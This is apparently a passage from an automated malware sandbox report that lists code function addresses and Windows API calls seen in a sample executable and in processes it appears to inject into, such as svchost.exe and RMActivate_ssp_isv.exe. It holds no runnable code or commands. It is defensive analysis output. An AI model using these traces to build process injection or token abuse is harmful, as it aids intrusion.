                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DB0 NtEnumerateKey,6_2_02F12DB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D00 NtSetInformationFile,6_2_02F12D00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13090 NtSetValueKey,6_2_02F13090
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13010 NtOpenDirectoryObject,6_2_02F13010
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13D70 NtOpenThread,6_2_02F13D70
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13D10 NtOpenProcessToken,6_2_02F13D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00629040 NtCreateFile,6_2_00629040
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006291B0 NtReadFile,6_2_006291B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006292A0 NtDeleteFile,6_2_006292A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00629340 NtClose,6_2_00629340
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006294B0 NtAllocateVirtualMemory,6_2_006294B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F1EC NtReadVirtualMemory,6_2_02C9F1EC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F13F NtReadVirtualMemory,6_2_02C9F13F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F8A2 NtClose,6_2_02C9F8A2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0049A1EF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00488310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00488310
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004951BD
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043E6A0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045D975
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043FCE0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004521C5
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004662D2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B03DA
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0046242E
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004525FA
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0048E616
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004466E1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0046878F
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00466844
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B0857
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00448808
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00498889
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045CB21
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00466DB6
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00446F9E
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00443030
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045F1D9
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00453187
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00431287
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00451484
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00445520
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00457696
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00445760
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00451978
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00469AB5
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B7DDB
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00451D90
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045BDA6
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043DF00
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00443FE0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F93600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402368
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DE73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041662E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFB7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_0280D3B95_2_0280D3B9
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE6695_2_027EE669
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC6495_2_027EC649
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F4E095_2_027F4E09
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F4E045_2_027F4E04
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC7995_2_027EC799
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC78D5_2_027EC78D
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE44D5_2_027EE44D
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE4495_2_027EE449
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F6C195_2_027F6C19
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F35495_2_027F3549
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F602C06_2_02F602C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F802746_2_02F80274
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA03E66_2_02FA03E6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEE3F06_2_02EEE3F0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9A3526_2_02F9A352
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F720006_2_02F72000
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F981CC6_2_02F981CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA01AA6_2_02FA01AA
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F941A26_2_02F941A2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F681586_2_02F68158
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED01006_2_02ED0100
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7A1186_2_02F7A118
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFC6E06_2_02EFC6E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDC7C06_2_02EDC7C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE07706_2_02EE0770
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F047506_2_02F04750
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8E4F66_2_02F8E4F6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F924466_2_02F92446
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F844206_2_02F84420
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA05916_2_02FA0591
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE05356_2_02EE0535
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDEA806_2_02EDEA80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F96BD76_2_02F96BD7
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9AB406_2_02F9AB40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F0E8F06_2_02F0E8F0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EC68B86_2_02EC68B8
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE28406_2_02EE2840
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEA8406_2_02EEA840
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE29A06_2_02EE29A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FAA9A66_2_02FAA9A6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF69626_2_02EF6962
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9EEDB6_2_02F9EEDB
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9CE936_2_02F9CE93
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF2E906_2_02EF2E90
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE0E596_2_02EE0E59
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9EE266_2_02F9EE26
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EECFE06_2_02EECFE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED2FC86_2_02ED2FC8
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F5EFA06_2_02F5EFA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F54F406_2_02F54F40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F00F306_2_02F00F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F82F306_2_02F82F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F22F286_2_02F22F28
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED0CF26_2_02ED0CF2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F80CB56_2_02F80CB5
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE0C006_2_02EE0C00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDADE06_2_02EDADE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF8DBF6_2_02EF8DBF
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7CD1F6_2_02F7CD1F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEAD006_2_02EEAD00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F812ED6_2_02F812ED
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFB2C06_2_02EFB2C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE52A06_2_02EE52A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F2739A6_2_02F2739A
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ECD34C6_2_02ECD34C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9132D6_2_02F9132D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F970E96_2_02F970E9
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F0E06_2_02F9F0E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE70C06_2_02EE70C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8F0CC6_2_02F8F0CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEB1B06_2_02EEB1B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FAB16B6_2_02FAB16B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F1516C6_2_02F1516C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ECF1726_2_02ECF172
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F916CC6_2_02F916CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F7B06_2_02F9F7B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED14606_2_02ED1460
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F43F6_2_02F9F43F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7D5B06_2_02F7D5B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F975716_2_02F97571
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8DAC66_2_02F8DAC6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F25AA06_2_02F25AA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7DAAC6_2_02F7DAAC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F81AA36_2_02F81AA3
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F53A6C6_2_02F53A6C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FA496_2_02F9FA49
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F97A466_2_02F97A46
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F55BF06_2_02F55BF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F1DBF96_2_02F1DBF9
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFFB806_2_02EFFB80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FB766_2_02F9FB76
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE38E06_2_02EE38E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F4D8006_2_02F4D800
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE99506_2_02EE9950
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFB9506_2_02EFB950
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F759106_2_02F75910
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE9EB06_2_02EE9EB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FFB16_2_02F9FFB1
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE1F926_2_02EE1F92
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FF096_2_02F9FF09
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FCF26_2_02F9FCF2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F59C326_2_02F59C32
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFFDC06_2_02EFFDC0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F97D736_2_02F97D73
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F91D5A6_2_02F91D5A
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE3D406_2_02EE3D40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00611B106_2_00611B10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CA106_2_0060CA10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CA146_2_0060CA14
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060CC306_2_0060CC30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AC106_2_0060AC10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AD606_2_0060AD60
